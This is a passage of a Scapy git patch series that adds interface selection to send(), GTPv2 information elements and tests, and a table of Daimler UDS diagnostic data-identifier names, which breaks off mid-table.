From fe520fd5a1e44976c0b395b8222aa3a303ef9705 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 1 Dec 2019 20:47:09 +0100 Subject: [PATCH 0001/1632] Select the network interface in send() --- scapy/sendrecv.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 302937a9e70..01412532946 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -306,9 +306,8 @@ def __gen_send(s, x, inter=0, loop=0, count=None, verbose=None, realtime=None, r @conf.commands.register -def send(x, inter=0, loop=0, count=None, - verbose=None, realtime=None, - return_packets=False, socket=None, *args, **kargs): +def send(x, inter=0, loop=0, count=None, verbose=None, realtime=None, + return_packets=False, socket=None, iface=None, *args, **kargs): """ Send packets at layer 3 @@ -325,6 +324,7 @@ def send(x, inter=0, loop=0, count=None, :returns: None """ need_closing = socket is None + kargs["iface"] = _interface_selection(iface, x) socket = socket or conf.L3socket(*args, **kargs) results = __gen_send(socket, x, inter=inter, loop=loop, count=count, verbose=verbose, From ba4a58f11d445f8a1792357d7393a2fbabcd11b1 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 21 Feb 2020 22:08:49 -0500 Subject: [PATCH 0002/1632] New IEs and fields for GTPv2 message --- scapy/contrib/gtp_v2.py | 75 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 75 insertions(+) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 155e3ede7b7..747cb3eda51 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -35,7 +35,16 @@ RATType = { + 1: "UTRAN", + 2: "GERAN" + 3: "WLAN" + 4: "GAN" + 5: "HSPA Evolution" 6: "EUTRAN", + 7: "Virtual", + 8: "EUTRAN-NB-IoT", + 9: "LTE-M", + 10: "NR", } # 3GPP TS 29.274 v16.1.0 table 6.1-1 @@ -207,6 +216,7 @@ 126: "Port Number", 127: "APN Restriction", 128: "Selection Mode", + 145: "UCI", 161: "Max MBR/APN-AMBR (MMBR)", 255: "Private Extension", } @@ -455,6 +465,22 @@ class IE_ULI(gtp.IE_Base): } +class IE_UCI(gtp.IE_Base): + name = "IE UCI" + fields_desc = [ByteEnumField("ietype", 145, IEType), + ShortField("length", 0), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + gtp.TBCDByteField("MCC", "", 2), + gtp.TBCDByteField("MNC", "", 1), + BitField("SPARE", 0, 5), + BitField("CSG_ID", 0, 27), + BitField("AccessMode", 0, 2), + BitField("SPARE", 0, 4), + BitField("LCSG", 0, 1), + BitField("CMI", 0, 1)] + + class IE_FTEID(gtp.IE_Base): name = "IE F-TEID" fields_desc = [ByteEnumField("ietype", 87, IEType), @@ -707,6 +733,54 @@ class IE_Indication(gtp.IE_Base): BitField("CLII", 0, 1), lambda pkt: pkt.length > 3), ConditionalField( BitField("CPSR", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("NSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("UASI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("DTCI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("BDWI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("PSCI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("PCRI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("AOSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("AOPI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("ROAAI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("EPCOSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("CPOPCI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("PMTSMI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("S11TF", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("PNSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("UNACCSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("WPMSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("5GSNN26", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("REPREFI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("5GSIWKI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("EEVRSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("LTEMUI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("LTEMPI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("ENBCRSI", 0, 1), lambda pkt: pkt.length > 3), + ConditionalField( + BitField("TSPCMI", 0, 1), lambda pkt: pkt.length > 3), ] @@ -1113,6 +1187,7 @@ def extract_padding(self, s): 126: IE_Port_Number, 127: IE_APN_Restriction, 128: IE_SelectionMode, + 145: IE_UCI, 161: IE_MMBR, 255: IE_PrivateExtension} From 69fc1f0f4be0265f253fd1066126d49fcd84e06e Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 21 Feb 2020 22:17:46 -0500 Subject: [PATCH 0003/1632] Add new RAT types --- scapy/contrib/gtp_v2.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 747cb3eda51..9b664ae0fc6 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -36,10 +36,10 @@ RATType = { 1: "UTRAN", - 2: "GERAN" - 3: "WLAN" - 4: "GAN" - 5: "HSPA Evolution" + 2: "GERAN", + 3: "WLAN", + 4: "GAN", + 5: "HSPA Evolution", 6: "EUTRAN", 7: "Virtual", 8: "EUTRAN-NB-IoT", From 7692e5d9fbd6a37bd6772162fe43dd121495986a Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 21 Feb 2020 23:18:27 -0500 Subject: [PATCH 0004/1632] Update gtp_v2.uts --- test/contrib/gtp_v2.uts | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index b41afd9e567..931756bd973 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -215,6 +215,16 @@ ie = IE_ULI(ietype='ULI', length=13, LAI_Present=0, ECGI_Present=1, TAI_Present= CGI_Present=0, TAI=ULI_TAI(MCC='234', MNC='02', TAC=12345), ECGI=ULI_ECGI(MCC='234', MNC='02', ECI=123456)) ie.ietype == 86 and ie.LAI_Present == 0 and ie.ECGI_Present == 1 and ie.TAI_Present == 1 and ie.RAI_Present == 0 and ie.SAI_Present == 0 and ie.CGI_Present == 0 and ie.TAI.MCC == b'234' and ie.TAI.MNC == b'02' and ie.TAI.TAC == 12345 and ie.ECGI.MCC == b'234' and ie.ECGI.MNC == b'02' and ie.ECGI.ECI == 123456 += IE_UCI, dissection +h = "fe1d70fa717ceeeeeeeeeeee080045000127a4f500003c11e9aec0a8ee80c0a87f50084b23a301131aa1482001070000000001020f009100080021f3540000001602" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0] +ie.CSG_ID == 22 and ie.AccessMode == 0 and ie.LCSG == 1 and ie.CMI == 0 and ie.MCC == b'123' and ie.MNC == b'45' + += IE_UCI, basic instantiation +ie = IE_UCI(ietype='UCI', length=8, CR_flag=0, instance=0, MCC=b'123', MNC=b'45', SPARE=0, CSG_ID=22, AccessMode=0, LCSG=1, CMI=0) +ie.ietype == 145 and ie.CSG_ID == 22 and ie.AccessMode == 0 and ie.LCSG == 1 and ie.CMI == 0 and ie.MCC == b'123' and ie.MNC == b'45' + = IE_FTEID, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) From d73a6cb8de2d9c626639737ec0f2d09e7d794aa9 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 23 Feb 2020 13:02:03 -0500 Subject: [PATCH 0005/1632] Revert "pull from secdev" --- scapy/contrib/automotive/daimler/__init__.py | 11 + .../contrib/automotive/daimler/definitions.py | 3398 +++++++++++++++++ scapy/contrib/gtp.py | 20 +- scapy/contrib/gtp_v2.py | 15 +- test/contrib/gtp.uts | 11 +- test/contrib/gtp_v2.uts | 3 - test/contrib/isotp.uts | 147 +- tox.ini | 4 +- 8 files changed, 3430 insertions(+), 179 deletions(-) create mode 100644 scapy/contrib/automotive/daimler/__init__.py create mode 100644 scapy/contrib/automotive/daimler/definitions.py diff --git a/scapy/contrib/automotive/daimler/__init__.py b/scapy/contrib/automotive/daimler/__init__.py new file mode 100644 index 00000000000..f06000ab15a --- /dev/null +++ b/scapy/contrib/automotive/daimler/__init__.py @@ -0,0 +1,11 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.status = skip + +""" +Package of contrib automotive bmw specific modules +that have to be loaded explicitly. +""" diff --git a/scapy/contrib/automotive/daimler/definitions.py b/scapy/contrib/automotive/daimler/definitions.py new file mode 100644 index 00000000000..9209f37d6d4 --- /dev/null +++ b/scapy/contrib/automotive/daimler/definitions.py @@ -0,0 +1,3398 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = Daimler specific definitions for UDS +# scapy.contrib.status = skip + + +from scapy.contrib.automotive.uds import UDS_RDBI + +UDS_RDBI.dataIdentifiers[0x0000] = "Read all stored UID from Kleer-Module" +UDS_RDBI.dataIdentifiers[0x0002] = "Freeze Frame Diagnostic Trouble Code" +UDS_RDBI.dataIdentifiers[0x0003] = "Kalibrierung" +UDS_RDBI.dataIdentifiers[0x0004] = "Calculated Load Value" +UDS_RDBI.dataIdentifiers[0x0005] = "Engine Coolant Temperature" +UDS_RDBI.dataIdentifiers[0x0006] = "Status FIN-Verriegelung" +UDS_RDBI.dataIdentifiers[0x0007] = "Service Sensorjustage Fortschrittsanzeige" # or Zustand ELV Fahrt Verriegelung 1 ELV Verrieglung +UDS_RDBI.dataIdentifiers[0x0008] = "Status Sensor Justage " +UDS_RDBI.dataIdentifiers[0x0009] = "EOL Sensorjustage Fortschrittsanzeige" # or Kraftstoffdruck Sollwert Sollwert Aktuell, Kraftstoffdruck Sollwert +UDS_RDBI.dataIdentifiers[0x000a] = "AD Werte Batteriespannung" +UDS_RDBI.dataIdentifiers[0x000b] = "EKP Motorspannung PRES Spannung" # or Batteriespannung PRES Spannung, Temperatursensor PRES Temperatur, Batteriespannung, KSD Sensor Signal PRES Kraftstoffdruck +UDS_RDBI.dataIdentifiers[0x000c] = "Engine Speed" # or Status Werte EKP Lauf, Status Werte, Status Werte EC Motor Stop Reason, Status Werte Kl 15 PRES aus ein 1Bit, Status Werte EKP Lauf PRES aus ein 1Bit +UDS_RDBI.dataIdentifiers[0x000d] = "Connected devices" +UDS_RDBI.dataIdentifiers[0x000f] = "IntakeAirTemperature" +UDS_RDBI.dataIdentifiers[0x0010] = "Keypad test" +UDS_RDBI.dataIdentifiers[0x0011] = "Present DVD Region Code" +UDS_RDBI.dataIdentifiers[0x0012] = "DVD Remaining Changes" # or manufacturing data container data container +UDS_RDBI.dataIdentifiers[0x0015] = "Status Drehfalle Fahrertuer Fahrertuer" +UDS_RDBI.dataIdentifiers[0x0016] = "Keypad test" +UDS_RDBI.dataIdentifiers[0x001a] = "DPM" +UDS_RDBI.dataIdentifiers[0x001c] = "Status Werte Entwicklung EC Motor Stop Reason" # or Status Werte Entwicklung EKP Lauf +UDS_RDBI.dataIdentifiers[0x0020] = "Lernwerte Eigenlenkgradient" +UDS_RDBI.dataIdentifiers[0x0021] = "Distance With Malfunction Indicator Lamp On" +UDS_RDBI.dataIdentifiers[0x0024] = "02 global variant coding" +UDS_RDBI.dataIdentifiers[0x0025] = "DCX Engineering Traceability" # or Motortyp Motortyp, Motortyp Lesen, @36076 +UDS_RDBI.dataIdentifiers[0x0026] = "Buswachhalterereignisse Anzahl Buswachhalter" # or Buswachhalterereignisse Lesen +UDS_RDBI.dataIdentifiers[0x0027] = "02 global variant coding 2" +UDS_RDBI.dataIdentifiers[0x0028] = "Versorgungsspannung Ubat" +UDS_RDBI.dataIdentifiers[0x0029] = "Versorgungsspannung Notbatterie Ubat" +UDS_RDBI.dataIdentifiers[0x0030] = "Warm-Up Cycles Since Code Clear" +UDS_RDBI.dataIdentifiers[0x0031] = "Distance Since Code Clear" +UDS_RDBI.dataIdentifiers[0x0033] = "Barometric Pressure" +UDS_RDBI.dataIdentifiers[0x0034] = "Zentralverriegelung Zentralverriegelung" +UDS_RDBI.dataIdentifiers[0x0040] = "Lernwerte Veigen" +UDS_RDBI.dataIdentifiers[0x0042] = "Control Module Voltage" +UDS_RDBI.dataIdentifiers[0x0043] = "DC-Block" +UDS_RDBI.dataIdentifiers[0x0046] = "Ambient Air Temperature" +UDS_RDBI.dataIdentifiers[0x0049] = "Accelarator Pedal Position" +UDS_RDBI.dataIdentifiers[0x0051] = "Read firmware from Kleer-Module" +UDS_RDBI.dataIdentifiers[0x0080] = "DC Block DC Block" +UDS_RDBI.dataIdentifiers[0x0081] = "Letzte Nachricht zur ELV Daten zur ELV" +UDS_RDBI.dataIdentifiers[0x0082] = "Letzte Nachricht von der ELV Daten der ELV" +UDS_RDBI.dataIdentifiers[0x008b] = "Konfiguration Buswachhaltermonitoring Abblendlicht Status beruecksichtigen" +UDS_RDBI.dataIdentifiers[0x008c] = "Buswachhalter Ereignisse" +UDS_RDBI.dataIdentifiers[0x00a0] = "MEC Manufacturers Enable" +UDS_RDBI.dataIdentifiers[0x00b4] = "Manufacturing Traceability Character" +UDS_RDBI.dataIdentifiers[0x00d1] = "Environment Data" +UDS_RDBI.dataIdentifiers[0x00e0] = "Musterstand" +UDS_RDBI.dataIdentifiers[0x0100] = "Reprogramming Attempt Counter" +UDS_RDBI.dataIdentifiers[0x0101] = "ECU Logging Data" # or Zugriff Fehlerspeicher DTC Lese Zaehler, Copy of Historical Interrogation Record DTC Read Counter +UDS_RDBI.dataIdentifiers[0x0102] = "Diagnostic Trace Memory Data Byte" +UDS_RDBI.dataIdentifiers[0x0103] = "VIN Odometer Counter Schreiben" +UDS_RDBI.dataIdentifiers[0x0104] = "VIN Odometer Counter Limit Schreiben" +UDS_RDBI.dataIdentifiers[0x0105] = "Usage Histogram" +UDS_RDBI.dataIdentifiers[0x0106] = "Common Event Ring Memory" +UDS_RDBI.dataIdentifiers[0x0107] = "Response on Event light activation state" +UDS_RDBI.dataIdentifiers[0x0108] = "Verbauliste" +UDS_RDBI.dataIdentifiers[0x010a] = "Vehicle Odometer in Low Resolution" +UDS_RDBI.dataIdentifiers[0x010b] = "Adjust ISO 15765 2 Block Size and STmin Parameter Block Size Value as defined in ISO 15765" +UDS_RDBI.dataIdentifiers[0x010c] = "Read Odometer value from Bus" +UDS_RDBI.dataIdentifiers[0x010d] = "Read Used EVC Config 460 VEHICLES FOR CANADA ADDITIONAL PARTS" +UDS_RDBI.dataIdentifiers[0x010f] = "Read LIN Slope" +UDS_RDBI.dataIdentifiers[0x0110] = "Dezentrales Power Management - Chassis CAN Infos" +UDS_RDBI.dataIdentifiers[0x0111] = "Dezentrales Power Management - Powertrain CAN Infos" +UDS_RDBI.dataIdentifiers[0x0112] = "Dezentrales Power Management - PT Sensor CAN Infos" +UDS_RDBI.dataIdentifiers[0x0115] = "EEProm lesen" +UDS_RDBI.dataIdentifiers[0x011d] = "Kalibrierung IMotOffset" +UDS_RDBI.dataIdentifiers[0x011e] = "EOL Pruefstempel EOL Pruefbyte" +UDS_RDBI.dataIdentifiers[0x011f] = "ICT Pruefstempel Hardware Version" +UDS_RDBI.dataIdentifiers[0x0120] = "Reprogramming Resume Information" +UDS_RDBI.dataIdentifiers[0x012d] = "Engine Style" +UDS_RDBI.dataIdentifiers[0x0130] = "Activate Partial Networking" +UDS_RDBI.dataIdentifiers[0x0131] = "Plausibilisierung Kraftstoffdrucksensor Referenzdaten Data locked" +UDS_RDBI.dataIdentifiers[0x0132] = "Operating Time of Last Ignition Cycle" +UDS_RDBI.dataIdentifiers[0x0133] = "Operating Time" +UDS_RDBI.dataIdentifiers[0x0134] = "SAR Trigger Counter" +UDS_RDBI.dataIdentifiers[0x0135] = "Number of SAR Write Cycles" +UDS_RDBI.dataIdentifiers[0x0136] = "Configure SAR Trigger Events" +UDS_RDBI.dataIdentifiers[0x0137] = "Enable SAR Memory Overwrite" +UDS_RDBI.dataIdentifiers[0x0138] = "Customer Settings" +UDS_RDBI.dataIdentifiers[0x0141] = "Zaehler Sychronisierungsverlust Odo" +UDS_RDBI.dataIdentifiers[0x0142] = "Availability Data" +UDS_RDBI.dataIdentifiers[0x0160] = "Ethernet Link Quality" +UDS_RDBI.dataIdentifiers[0x0161] = "Ethernet Switch Counters" +UDS_RDBI.dataIdentifiers[0x0162] = "Ethernet Drop Counters" +UDS_RDBI.dataIdentifiers[0x0163] = "Ethernet MIB Counters" +UDS_RDBI.dataIdentifiers[0x0164] = "Ethernet Link Statistics" +UDS_RDBI.dataIdentifiers[0x0165] = "Ethernet Link" +UDS_RDBI.dataIdentifiers[0x0166] = "Ethernet Port" +UDS_RDBI.dataIdentifiers[0x0167] = "Ethernet Wake up Line" +UDS_RDBI.dataIdentifiers[0x0168] = "Ethernet Wake up Line Activation" +UDS_RDBI.dataIdentifiers[0x0169] = "Ethernet Wake up Line Pulse Counter" +UDS_RDBI.dataIdentifiers[0x016a] = "Ethernet Transceiver Identification" +UDS_RDBI.dataIdentifiers[0x016b] = "Ethernet Switch Identification" +UDS_RDBI.dataIdentifiers[0x016c] = "Write Ethernet Port Mirroring Configuration" +UDS_RDBI.dataIdentifiers[0x016d] = "Read Ethernet Port Mirroring Configuration" +UDS_RDBI.dataIdentifiers[0x016e] = "Ethernet Port Mirroring" +UDS_RDBI.dataIdentifiers[0x016f] = "Ethernet MAC and IP Addresses" +UDS_RDBI.dataIdentifiers[0x0170] = "Ethernet Switch Address Table" +UDS_RDBI.dataIdentifiers[0x0171] = "Ethernet Hardware Configuration" +UDS_RDBI.dataIdentifiers[0x0173] = "Ethernet Switch Configuration" +UDS_RDBI.dataIdentifiers[0x0174] = "Ethernet Link Training Duration" +UDS_RDBI.dataIdentifiers[0x0175] = "Ethernet ENV Data" +UDS_RDBI.dataIdentifiers[0x0180] = "Root CA Certificate" +UDS_RDBI.dataIdentifiers[0x0181] = "Backend CA Certificate" +UDS_RDBI.dataIdentifiers[0x0182] = "Backend CA Certificate Identification" +UDS_RDBI.dataIdentifiers[0x0183] = "ECU Certificate" +UDS_RDBI.dataIdentifiers[0x0184] = "Diagnostic Authentication Certificate Identification" +UDS_RDBI.dataIdentifiers[0x0185] = "Access Control List Version" +UDS_RDBI.dataIdentifiers[0x0186] = "Secured System Date and Time" +UDS_RDBI.dataIdentifiers[0x0187] = "Security Event Log" +UDS_RDBI.dataIdentifiers[0x0188] = "SecOC PDU Data IDs and Key Checksum" +UDS_RDBI.dataIdentifiers[0x0189] = "SecOC Vehicle Shared Secret Hash" +UDS_RDBI.dataIdentifiers[0x018a] = "SecOC Local TickCount" +UDS_RDBI.dataIdentifiers[0x018b] = "SecOc ENV Data" +UDS_RDBI.dataIdentifiers[0x018c] = "Ladezustand" +UDS_RDBI.dataIdentifiers[0x0190] = "Security Event Log Current Counter Values" +UDS_RDBI.dataIdentifiers[0x01fa] = "Status Spiegelabklappung" +UDS_RDBI.dataIdentifiers[0x0202] = "Currents" # or DependencyInformation, BDMS Mode Write Entwicklung, WS input voltage, Drehfalle Fahrertuer +UDS_RDBI.dataIdentifiers[0x0203] = "Engine" # or Hardware Terminals, Keyless Go, HW terminals, Keyless Go KG vorhanden, Kl 50 input voltage +UDS_RDBI.dataIdentifiers[0x0204] = "Gearbox" # or PN48 Battery Switch State, Kl 30Z voltage +UDS_RDBI.dataIdentifiers[0x0205] = "Config" # or ST voltage +UDS_RDBI.dataIdentifiers[0x0206] = "Kombi" +UDS_RDBI.dataIdentifiers[0x0207] = "DataStatus" # or Torque +UDS_RDBI.dataIdentifiers[0x0208] = "Blinker" +UDS_RDBI.dataIdentifiers[0x0209] = "CAN ECU State" # or Status EOL Sensorjustag" +UDS_RDBI.dataIdentifiers[0x020a] = "ErrorBytes" # or Entry Conditions RUN, Access Conditions RUN, Drehfallen +UDS_RDBI.dataIdentifiers[0x020b] = "Fail Conditions Position Sensor Offset Learning" # or Fail Conditions ROL, BsdData +UDS_RDBI.dataIdentifiers[0x020c] = "Zentralverriegelung Letzte Aussenentriegelungsursache" # or SensorPos, CVN calculation, Predriver Shutdownpathtest Isolation Information +UDS_RDBI.dataIdentifiers[0x020d] = "SMA" +UDS_RDBI.dataIdentifiers[0x020e] = "Status Transportmodus Status Transportmodus" +UDS_RDBI.dataIdentifiers[0x0210] = "Letzte Nachricht von der ELV Read SSP Daten" # or Lernwerte Drehrate, 0210 Amplifier Supply Voltage Signal Error +UDS_RDBI.dataIdentifiers[0x0211] = "Regelparameter" +UDS_RDBI.dataIdentifiers[0x0212] = "Konfiguration Produktion" # or Klemmenstatus Read Klemme 15, ASIC Type +UDS_RDBI.dataIdentifiers[0x0213] = "Filterparameter des Algorithmus" # or Asic AssemblyLotID SYSSER0 +UDS_RDBI.dataIdentifiers[0x0215] = "Thermoschutzparameter des Algorithmus Zaehler" +UDS_RDBI.dataIdentifiers[0x0217] = "Funktionsstatus Hexdumps NV" +UDS_RDBI.dataIdentifiers[0x0218] = "Thermoschutzparameter des Algorithmus Erhoehungswerte" +UDS_RDBI.dataIdentifiers[0x0219] = "DidAt Konfigurationskennung" +UDS_RDBI.dataIdentifiers[0x0220] = "0220 Central Components Supply Voltage Signal Error" # or Transmitter IDs +UDS_RDBI.dataIdentifiers[0x0221] = "LeftFront Tx Id" +UDS_RDBI.dataIdentifiers[0x0222] = "RightFront Tx Id" +UDS_RDBI.dataIdentifiers[0x0223] = "Tuerzusatzsicherung Zustand Tuerzusatzsicherung" # or Rightrear Tx Id +UDS_RDBI.dataIdentifiers[0x0224] = "LeftRear Tx Id" +UDS_RDBI.dataIdentifiers[0x0225] = "Fahrzeuginformationen" +UDS_RDBI.dataIdentifiers[0x0226] = "Defaultwerte I/O Control" +UDS_RDBI.dataIdentifiers[0x0228] = "EOL-Tester Informationen Antrieb" +UDS_RDBI.dataIdentifiers[0x022c] = "Drehsperre" +UDS_RDBI.dataIdentifiers[0x0230] = "0230 External 5V Supply Voltage Signal Error" # or Lernwerte Lenkwinkel +UDS_RDBI.dataIdentifiers[0x0231] = "PM Status H0 Schalter" +UDS_RDBI.dataIdentifiers[0x0232] = "Fahrzeugausstattung " +UDS_RDBI.dataIdentifiers[0x0233] = "Globale Variantencodierung auslesen Baureihe" +UDS_RDBI.dataIdentifiers[0x023a] = "Eigendiagnose Eintraege global ED EEPROM Code" # or Eigendiagnose Eintraege global loeschen +UDS_RDBI.dataIdentifiers[0x0240] = "PlatformThresholds CurrentlyInUse" # or 0240 Audio Codec Supply Voltage Signal Error +UDS_RDBI.dataIdentifiers[0x0241] = "PlatformThresholds Programmed" # or Internal Power Supplies +UDS_RDBI.dataIdentifiers[0x0242] = "Axle Nominal Isochores" +UDS_RDBI.dataIdentifiers[0x0243] = "Filling Detection Compare Values" +UDS_RDBI.dataIdentifiers[0x0245] = "Read Message Memory" +UDS_RDBI.dataIdentifiers[0x0247] = "Read Activation Memory" +UDS_RDBI.dataIdentifiers[0x0249] = "PlatformThresholds MinimumReferencePressure" +UDS_RDBI.dataIdentifiers[0x024a] = "PlatformThresholds LogicalData" +UDS_RDBI.dataIdentifiers[0x0255] = "WAL failure Statistics" +UDS_RDBI.dataIdentifiers[0x0256] = "Axle/Side Location" +UDS_RDBI.dataIdentifiers[0x0258] = "Get WAL monitoring counters" +UDS_RDBI.dataIdentifiers[0x025a] = "Autolocation Overide Switch" +UDS_RDBI.dataIdentifiers[0x025b] = "WAL RSSI Monitor" +UDS_RDBI.dataIdentifiers[0x0260] = "Status EOL Funktionstest" +UDS_RDBI.dataIdentifiers[0x0261] = "RF Statistics Right Front" +UDS_RDBI.dataIdentifiers[0x0262] = "RF Statistics Right Rear" +UDS_RDBI.dataIdentifiers[0x0263] = "RF Statistics Left Rear" +UDS_RDBI.dataIdentifiers[0x0265] = "LastReceivedTelegram LF" +UDS_RDBI.dataIdentifiers[0x0266] = "LastReceivedTelegram RF" +UDS_RDBI.dataIdentifiers[0x0267] = "LastReceivedTelegram RR" +UDS_RDBI.dataIdentifiers[0x0268] = "LastReceivedTelegram LR" +UDS_RDBI.dataIdentifiers[0x0271] = "CoastMode Control" +UDS_RDBI.dataIdentifiers[0x0273] = "Last Reset Type Counters" +UDS_RDBI.dataIdentifiers[0x0283] = "Local Battery Voltage" +UDS_RDBI.dataIdentifiers[0x0287] = "Low Battery Data" +UDS_RDBI.dataIdentifiers[0x0290] = "Low Battery Data Left Front" +UDS_RDBI.dataIdentifiers[0x0291] = "Low Battery Data Right Front" +UDS_RDBI.dataIdentifiers[0x0292] = "Low Battery Data Right Rear" +UDS_RDBI.dataIdentifiers[0x0293] = "Low Battery Data Left Rear" +UDS_RDBI.dataIdentifiers[0x0298] = "SEL Statistical data" +UDS_RDBI.dataIdentifiers[0x029c] = "RF Gain Mode CurrentlyInUse" +UDS_RDBI.dataIdentifiers[0x029d] = "RF Gain Mode Programmed" +UDS_RDBI.dataIdentifiers[0x02a0] = "Pressure values for model BR221" +UDS_RDBI.dataIdentifiers[0x02a1] = "Pressure values for model BR216" +UDS_RDBI.dataIdentifiers[0x02a2] = "Pressure values for model BR212" +UDS_RDBI.dataIdentifiers[0x02a3] = "Pressure values for model BR197/BR164" +UDS_RDBI.dataIdentifiers[0x02a4] = "Pressure values for model BR166" +UDS_RDBI.dataIdentifiers[0x02a5] = "Pressure values for model BR172/BR251" +UDS_RDBI.dataIdentifiers[0x02a6] = "Pressure values for model BR218" +UDS_RDBI.dataIdentifiers[0x02a7] = "Pressure values for model BR207" +UDS_RDBI.dataIdentifiers[0x02a8] = "Pressure values for model BR204" +UDS_RDBI.dataIdentifiers[0x02af] = "Gelernte HFS/ARWT Normierparameter NV" +UDS_RDBI.dataIdentifiers[0x02b1] = "Variant Coding" +UDS_RDBI.dataIdentifiers[0x02b3] = "Read RF" +UDS_RDBI.dataIdentifiers[0x02d7] = "Warntongeber" +UDS_RDBI.dataIdentifiers[0x02dd] = "Diagnosedaten Service Diagnosedaten" +UDS_RDBI.dataIdentifiers[0x02e4] = "MB Teilenummer Teilenummer Ersatzteil" +UDS_RDBI.dataIdentifiers[0x0300] = "Flanken Erkennung Fahrertuer" +UDS_RDBI.dataIdentifiers[0x0301] = "SynchronizationLost Data" # or 08 Parameter Not Acknowledge Time Schreiben, SynchronizationLost Counter, DidA Rahmenwiederholungen DidA Rahmenwiederholungen, 08 Parameter Not Acknowledge Time Lesen +UDS_RDBI.dataIdentifiers[0x0302] = "SynchronizationLost Odo0 bis 7" # or 09 Parameter Diag Active Time Lesen, 09 Parameter Diag Active Time Schreiben, Reservebaureihen und Reservekarosserievarianten Baureihe BR +UDS_RDBI.dataIdentifiers[0x0303] = "Daten Antennenmodul" # or Daten Antennenmodul Read Frequenzvariante, Daten Antennenmodul Read Pmin, Daten Antennenmodul EEPROM Patch Level, Daten Antennenmodul Read KG Pmax, Daten Antennenmodul Frequenzvariante, Daten Antennenmodul Read KG Pmin +UDS_RDBI.dataIdentifiers[0x0304] = "HF Konfig" # or LifeCycle, HF Konfig Dida, HF Konfig Sendeleistung KG +UDS_RDBI.dataIdentifiers[0x0305] = "FBS mobil Tuergriff" +UDS_RDBI.dataIdentifiers[0x0306] = "ZV Konfiguration Write" # or ZV Konfiguration Read, Sensor Offset +UDS_RDBI.dataIdentifiers[0x0307] = "Position Sensor Offset" +UDS_RDBI.dataIdentifiers[0x0308] = "Status VIN Verriegelung" # or Predicted Fuel Pressure Offset +UDS_RDBI.dataIdentifiers[0x0309] = "Compile Time" +UDS_RDBI.dataIdentifiers[0x030a] = "ZGW Verbaute Steuergeraete Soll Engine" +UDS_RDBI.dataIdentifiers[0x030b] = "Number of cold start interruptted by voltage out of range" +UDS_RDBI.dataIdentifiers[0x030c] = "Number of rv close 100ms" +UDS_RDBI.dataIdentifiers[0x030d] = "verbaute Steuergeraete Soll Bus 4" +UDS_RDBI.dataIdentifiers[0x030e] = "verbaute Steuergeraete Soll Bus 5" +UDS_RDBI.dataIdentifiers[0x030f] = "verbaute Steuergeraete Soll Bus 6" +UDS_RDBI.dataIdentifiers[0x0310] = "verbaute Steuergeraete Soll BodyRaw ECU Vektor Soll" +UDS_RDBI.dataIdentifiers[0x0311] = "verbaute Steuergeraete Soll Chassis1 Raw ECU Vektor Soll" +UDS_RDBI.dataIdentifiers[0x0312] = "verbaute Steuergeraete Soll Chassis2 Raw ECU Vektor Soll" +UDS_RDBI.dataIdentifiers[0x0313] = "verbaute Steuergeraete Soll Diagnostic CGW" +UDS_RDBI.dataIdentifiers[0x0314] 